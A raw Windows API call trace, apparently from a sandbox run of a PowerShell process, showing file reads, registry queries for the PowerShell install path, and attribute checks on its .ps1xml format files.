	[0514.358] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.358] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.359] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.359] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.359] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.359] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.360] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.360] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.360] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.360] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.361] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.362] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.362] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.362] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.362] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.363] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.363] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.363] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.363] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.363] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.364] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.364] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.364] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.364] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.365] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.365] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.710] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.710] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.710] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.710] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.711] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.711] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.711] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.711] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0515.712] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1b4, lpOverlapped=0x0) returned 1
	[0515.712] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x0, lpOverlapped=0x0) returned 1
	[0515.712] CloseHandle (hObject=0x320) returned 1
	[0515.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.712] SetErrorMode (uMode=0x1) returned 0x1
	[0515.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0515.712] SetErrorMode (uMode=0x1) returned 0x1
	[0515.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.713] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x320) returned 0x0
	[0515.713] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0515.713] CoTaskMemAlloc (cb=0x5a) returned 0x1b844460
	[0515.713] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x1b844460, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0515.713] CoTaskMemFree (pv=0x1b844460) 
	[0515.713] RegCloseKey (hKey=0x320) returned 0x0
	[0515.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0517.390] VirtualQuery (in: lpAddress=0xebd90, lpBuffer=0xecc50, dwLength=0x30 | out: lpBuffer=0xecc50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0517.400] VirtualQuery (in: lpAddress=0xebd90, lpBuffer=0xecc50, dwLength=0x30 | out: lpBuffer=0xecc50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0519.386] VirtualQuery (in: lpAddress=0xebd90, lpBuffer=0xecc50, dwLength=0x30 | out: lpBuffer=0xecc50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0519.387] VirtualQuery (in: lpAddress=0xebd90, lpBuffer=0xecc50, dwLength=0x30 | out: lpBuffer=0xecc50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0519.391] VirtualQuery (in: lpAddress=0xebd90, lpBuffer=0xecc50, dwLength=0x30 | out: lpBuffer=0xecc50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0520.699] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0520.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0520.699] CoTaskMemFree (pv=0x30ac60) 
	[0520.715] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x320) returned 0x0
	[0520.715] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0xed25c, lpData=0x0, lpcbData=0xed258*=0x0 | out: lpType=0xed25c*=0x1, lpData=0x0, lpcbData=0xed258*=0x74) returned 0x0
	[0520.715] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0xed1cc, lpData=0x0, lpcbData=0xed1c8*=0x0 | out: lpType=0xed1cc*=0x1, lpData=0x0, lpcbData=0xed1c8*=0x74) returned 0x0
	[0520.715] CoTaskMemAlloc (cb=0x78) returned 0x2c23f0
	[0520.715] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0xed19c, lpData=0x2c23f0, lpcbData=0xed198*=0x74 | out: lpType=0xed19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed198*=0x74) returned 0x0
	[0520.715] CoTaskMemFree (pv=0x2c23f0) 
	[0520.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0520.716] SetErrorMode (uMode=0x1) returned 0x1
	[0520.716] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0520.716] SetErrorMode (uMode=0x1) returned 0x1
	[0521.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.748] SetErrorMode (uMode=0x1) returned 0x1
	[0521.748] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0521.748] SetErrorMode (uMode=0x1) returned 0x1
	[0521.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0521.748] SetErrorMode (uMode=0x1) returned 0x1
	[0521.748] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0521.748] SetErrorMode (uMode=0x1) returned 0x1
	[0521.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.749] SetErrorMode (uMode=0x1) returned 0x1
	[0521.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0521.749] SetErrorMode (uMode=0x1) returned 0x1
	[0521.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.749] SetErrorMode (uMode=0x1) returned 0x1
	[0521.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0521.749] SetErrorMode (uMode=0x1) returned 0x1
	[0521.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0521.750] SetErrorMode (uMode=0x1) returned 0x1
	[0521.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0521.750] SetErrorMode (uMode=0x1) returned 0x1
	[0521.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0521.750] SetErrorMode (uMode=0x1) returned 0x1
	[0521.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0521.751] SetErrorMode (uMode=0x1) returned 0x1
	[0521.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0521.751] SetErrorMode (uMode=0x1) returned 0x1
	[0521.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0521.751] SetErrorMode (uMode=0x1) returned 0x1
	[0521.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0521.752] SetErrorMode (uMode=0x1) returned 0x1
	[0521.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0521.752] SetErrorMode (uMode=0x1) returned 0x1
	[0521.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0521.752] SetErrorMode (uMode=0x1) returned 0x1
	[0521.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0521.752] SetErrorMode (uMode=0x1) returned 0x1
	[0521.754] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0521.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.754] CoTaskMemFree (pv=0x30ac60) 
	[0521.766] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0521.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.766] CoTaskMemFree (pv=0x30ac60) 
	[0521.768] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0521.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.768] CoTaskMemFree (pv=0x30ac60) 
	[0521.770] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
